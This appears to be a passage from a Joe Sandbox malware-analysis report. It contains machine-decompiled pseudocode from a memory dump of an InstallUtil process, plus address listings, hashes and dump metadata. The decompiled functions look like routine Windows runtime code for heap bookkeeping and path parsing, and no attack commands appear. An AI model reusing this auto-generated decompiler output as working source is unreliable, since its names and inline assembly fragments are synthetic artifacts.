								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13b60e8;
								if( *0x13b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01309710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01306DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0130F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0130F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0130F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0130FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0130FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0130F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0130F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01394CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0131D130(_t427, _t494, _t511);
				}
			}

0x01395ba5
0x01395baa
0x01395baf
0x01395bb4
0x01395bb6
0x01395bbc
0x01395bbe
0x01395bc4
0x01395bcd
0x01395bd3
0x01395bd6
0x01395bdc
0x01395be0
0x01395be3
0x01395beb
0x01395bf2
0x01395bf8
0x01395bfe
0x01395c04
0x01395c0e
0x01395c18
0x01395c1f
0x01395c25
0x01395c2a
0x01395c2c
0x01395c32
0x01395c3a
0x01395c3f
0x01395c42
0x01395c48
0x01395c5b
0x01395c5b
0x01395c2c
0x01395cb7
0x01395cb9
0x01395cbf
0x01395cc2
0x01395cca
0x01395ccb
0x01395ccb
0x01395cd1
0x01395cd7
0x01395cda
0x01395ce1
0x01395ce4
0x01395ce7
0x01395ced
0x01395cf3
0x01395cf9
0x01395cff
0x01395d08
0x01395d0a
0x01395d0e
0x01395d10
0x00000000
0x00000000
0x01395d16
0x01395d1a
0x00000000
0x00000000
0x01395d20
0x01395d22
0x01395d25
0x01395d2f
0x01395d2f
0x01395d33
0x01395d3d
0x01395d49
0x01395d4b
0x00000000
0x00000000
0x01395d5a
0x01395d5d
0x01395d60
0x00000000
0x00000000
0x01395d66
0x01395d69
0x00000000
0x00000000
0x01395d6f
0x01395d6f
0x01395d73
0x01395d79
0x01395d7f
0x01395d86
0x01395d95
0x01395d98
0x01395dba
0x01395dcb
0x01395dce
0x01395dd3
0x01395dd6
0x01395dd8
0x01395de6
0x01395dec
0x01395dee
0x01395df1
0x01395df3
0x0139635a
0x0139635a
0x00000000
0x0139635a
0x01395dfe
0x01395e02
0x01395e05
0x01395e07
0x01395e10
0x01395e13
0x01395e1b
0x01395e1c
0x01395e21
0x01395e22
0x01395e23
0x01395e25
0x01395e2a
0x01395e2c
0x01395e2e
0x01395e36
0x01395e39
0x01395e42
0x01395e47
0x01395e4d
0x01395e54
0x01395e54
0x01395e54
0x01395e2e
0x01395e5c
0x01395e5f
0x01395e62
0x01395e64
0x01395e6b
0x01395e70
0x01395e7a
0x01395e7a
0x01395e7a
0x01395e6b
0x01395e7e
0x01395e7f
0x01395e7f
0x01395e81
0x01395e87
0x01395e8b
0x01395e8c
0x01395e8c
0x01395e8c
0x01395e9a
0x01395e9c
0x01395ea2
0x01395ea6
0x01395f50
0x01395f50
0x01395f57
0x01395f66
0x01395f66
0x01395f66
0x01395f68
0x01395f6a
0x013963d0
0x00000000
0x01395f70
0x01395f70
0x01395f91
0x01395f9c
0x01395f9e
0x01395fa4
0x01395fa6
0x0139638c
0x01396392
0x013963a1
0x013963a7
0x013963af
0x013963af
0x013963bd
0x013963d8
0x00000000
0x013963d8
0x01395fac
0x01395fb2
0x01395fb4
0x01395fbd
0x01395fc6
0x01395fce
0x01395fd4
0x01395fdc
0x01395fec
0x01395fed
0x01395fee
0x01395fef
0x01395ff9
0x01395ffa
0x01395ffb
0x01395ffc
0x01396000
0x01396004
0x01396012
0x01396012
0x01396018
0x01396019
0x0139601a
0x0139601b
0x0139601c
0x01396020
0x01396059
0x0139605c
0x01396061
0x01396061
0x01396022
0x01396022
0x01396022
0x01396025
0x0139602a
0x0139602b
0x01396031
0x01396037
0x01396038
0x0139603e
0x01396048
0x01396049
0x0139604a
0x0139604b
0x0139604c
0x0139604d
0x01396053
0x01396054
0x01396054
0x01396062
0x01396065
0x01396067
0x0139606a
0x01396070
0x01396075
0x01396076
0x01396081
0x01396087
0x01396095
0x01396099
0x0139609e
0x013960a4
0x013960ae
0x013960b0
0x013960b3
0x013960b6
0x013960b8
0x013960ba
0x013960ba
0x013960ba
0x013960ba
0x013960be
0x013960c0
0x013960c5
0x013960c5
0x013960c5
0x013960c6
0x013960cd
0x01396114
0x013960cf
0x013960cf
0x013960d4
0x013960d5
0x013960da
0x013960db
0x013960e1
0x013960e2
0x013960e8
0x013960f8
0x013960fd
0x013960fe
0x01396102
0x01396104
0x01396107
0x01396109
0x0139610b
0x0139610b
0x0139610b
0x0139610b
0x0139610f
0x0139610f
0x01396117
0x0139611a
0x0139611f
0x01396125
0x01396134
0x01396139
0x0139613f
0x01396146
0x01396148
0x0139614b
0x0139614d
0x0139614f
0x0139614f
0x0139614f
0x0139614f
0x01396153
0x01396159
0x01396159
0x0139615c
0x01396163
0x01396169
0x0139616c
0x01396172
0x01396181
0x01396186
0x01396187
0x0139618b
0x01396191
0x01396195
0x013961a3
0x013961bb
0x013961c0
0x013961c3
0x013961cc
0x013961d0
0x013961dc
0x013961de
0x013961e1
0x013961e4
0x013961e6
0x013961e8
0x013961e8
0x013961e8
0x013961e8
0x013961e6
0x013961ec
0x013961f3
0x01396203
0x01396209
0x0139620a
0x01396216
0x0139621d
0x01396227
0x01396241
0x01396246
0x0139624c
0x01396257
0x01396259
0x0139625c
0x0139625e
0x01396260
0x01396260
0x01396260
0x01396260
0x0139625e
0x01396264
0x01396267
0x01396269
0x01396315
0x01396315
0x0139631b
0x0139631e
0x01396324
0x01396327
0x0139632f
0x01396330
0x01396333
0x0139633a
0x0139633c
0x01396335
0x01396335
0x01396335
0x0139633f
0x01396342
0x0139634c
0x01396352
0x01396355
0x01396355
0x01396359
0x00000000
0x0139626f
0x01396275
0x01396275
0x01396278
0x0139627e
0x0139627e
0x01396281
0x01396287
0x0139628d
0x01396298
0x0139629c
0x013962a2
0x0139629e
0x0139629e
0x0139629e
0x013962a7
0x013962a7
0x013962aa
0x013962b0
0x013962f0
0x013962f0
0x013962f2
0x013962f8
0x013962fd
0x013962b2
0x013962b2
0x013962b2
0x013962b5
0x013962dd
0x013962e2
0x013962e5
0x013962b7
0x013962b8
0x013962bb
0x013962bd
0x013962c0
0x013962c4
0x013962cd
0x013962cd
0x013962c0
0x013962bb
0x013962b5
0x01396302
0x01396303
0x01396305
0x01396305
0x01396305
0x0139630c
0x0139630c
0x00000000
0x0139627e
0x01396269
0x01395eac
0x01395ebb
0x01395ebe
0x01395ecb
0x01395ecb
0x01395ece
0x01395ece
0x01395ed4
0x01395ed7
0x01395ed9
0x01395edb
0x01395edb
0x01395ee1
0x01395ee1
0x01395ee3
0x01395f20
0x01395f20
0x01395ee5
0x01395ee5
0x01395ee5
0x01395ee8
0x01395f11
0x01395f18
0x01395eea
0x01395eea
0x01395eed
0x01395ef2
0x01395ef8
0x01395efb
0x01395f0a
0x01395f0a
0x01395eed
0x01395ee8
0x01395f22
0x01395f28
0x00000000
0x00000000
0x01395f30
0x01395f31
0x01395f37
0x01395f3a
0x01395f3d
0x01395f44
0x00000000
0x00000000
0x00000000
0x01395f46
0x01395f48
0x01395f4d
0x00000000
0x01395f4d
0x01395dda
0x01395ddf
0x00000000
0x01395ddf
0x01395dd8
0x01395da7
0x01395da9
0x01395dac
0x01395dae
0x00000000
0x01395db4
0x01395db4
0x00000000
0x01395db4
0x01395dae
0x01395d88
0x01395d8d
0x01396363
0x01396369
0x0139636a
0x01396370
0x01396372
0x0139637a
0x0139637b
0x0139637d
0x00000000
0x00000000
0x0139637f
0x01396385
0x00000000
0x01396385
0x01395d38
0x01395d3b
0x00000000
0x00000000
0x00000000
0x01395d3b
0x01395d27
0x01395d29
0x00000000
0x00000000
0x00000000
0x01396360
0x00000000
0x01396360
0x01395c10
0x01395c10
0x013963da
0x013963e5
0x013963e5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
Instruction ID: 527eac014dee62a4157387fb0c9d0496986dcba8fae2e808bb21b5663f5c9401
Opcode Fuzzy Hash: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
Instruction Fuzzy Hash: 2D425AB1D01229CFDF25CF68C881BA9BBB5FF49308F1481AAD94DAB252D7349985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012E4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E012E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x13bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E012FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E012E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L012E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E012E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M012E45F8))) {
												case 0:
													_v568 = 0x12a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L012E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
